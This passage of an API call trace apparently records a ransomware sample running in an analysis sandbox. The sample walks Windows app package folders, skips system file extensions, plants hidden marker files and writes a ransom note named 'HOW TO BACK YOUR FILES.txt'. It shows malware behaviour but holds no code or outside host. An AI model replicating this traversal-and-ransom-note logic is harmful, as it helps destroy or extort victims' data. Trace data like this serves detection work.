lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0056.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0056.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0056.105] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0056.105] lstrlenW (lpString="Rabbit4444") returned 10 [0056.105] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0056.105] lstrlenW (lpString=".dll") returned 4 [0056.105] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0056.105] lstrlenW (lpString=".lnk") returned 4 [0056.105] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0056.105] lstrlenW (lpString=".ini") returned 4 [0056.105] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0056.105] lstrlenW (lpString=".sys") returned 4 [0056.105] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0056.105] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdacc005c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdacc005c, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdacc005c, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0056.105] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0056.106] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.106] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.106] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.106] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.107] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.107] CloseHandle (hObject=0x278) returned 1 [0056.107] CloseHandle (hObject=0x27c) returned 1 [0056.108] GetCurrentThreadId () returned 0xd98 [0056.108] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0056.108] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState" [0056.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1238d0 | out: hHeap=0xe0000) returned 1 [0056.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0056.108] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState" [0056.108] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\" [0056.108] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0056.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.111] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.114] FlushFileBuffers (hFile=0x27c) returned 1 [0056.115] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.115] CloseHandle (hObject=0x27c) returned 1 [0056.116] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState") returned 86 [0056.116] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.116] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34ce1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeac43c5c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0056.116] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.116] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.116] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.116] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.116] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34ce1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeac43c5c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.116] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.116] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.116] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.116] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.116] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.116] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeac43c5c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeac43c5c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac43c5c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.116] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.116] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.116] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeac43c5c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeac43c5c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac43c5c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.117] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0056.117] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.117] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.117] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.117] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.117] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.117] CloseHandle (hObject=0x278) returned 1 [0056.117] CloseHandle (hObject=0x27c) returned 1 [0056.118] GetCurrentThreadId () returned 0xd98 [0056.118] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0056.118] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState" [0056.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123818 | out: hHeap=0xe0000) returned 1 [0056.118] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0056.118] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState" [0056.118] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\" [0056.118] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0056.118] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.119] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.122] FlushFileBuffers (hFile=0x27c) returned 1 [0056.123] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.123] CloseHandle (hObject=0x27c) returned 1 [0056.123] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState") returned 84 [0056.123] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.123] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34794, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeac69f82, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0056.123] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.123] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.123] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.123] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.124] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34794, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeac69f82, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.124] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.124] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.124] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.124] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.124] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.124] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeac69f82, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeac69f82, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac69f82, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.124] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.124] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.124] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeac69f82, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeac69f82, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac69f82, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.124] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0056.124] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.124] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.124] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.125] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.125] CloseHandle (hObject=0x278) returned 1 [0056.125] CloseHandle (hObject=0x27c) returned 1 [0056.125] GetCurrentThreadId () returned 0xd98 [0056.125] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0056.125] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache" [0056.125] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0056.125] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0056.125] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache" [0056.125] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\" [0056.125] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0056.125] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.126] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.129] FlushFileBuffers (hFile=0x27c) returned 1 [0056.129] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.130] CloseHandle (hObject=0x27c) returned 1 [0056.130] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache") returned 84 [0056.130] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.130] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34378, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeac69f82, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0056.130] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.130] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.130] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.130] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.130] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d34378, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeac69f82, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.130] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.130] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.130] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.130] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.130] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.131] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeac69f82, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeac69f82, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac69f82, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.131] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.131] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.131] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeac69f82, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeac69f82, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeac69f82, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.131] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0056.131] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.131] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.131] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.131] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.132] CloseHandle (hObject=0x278) returned 1 [0056.132] CloseHandle (hObject=0x27c) returned 1 [0056.132] GetCurrentThreadId () returned 0xd98 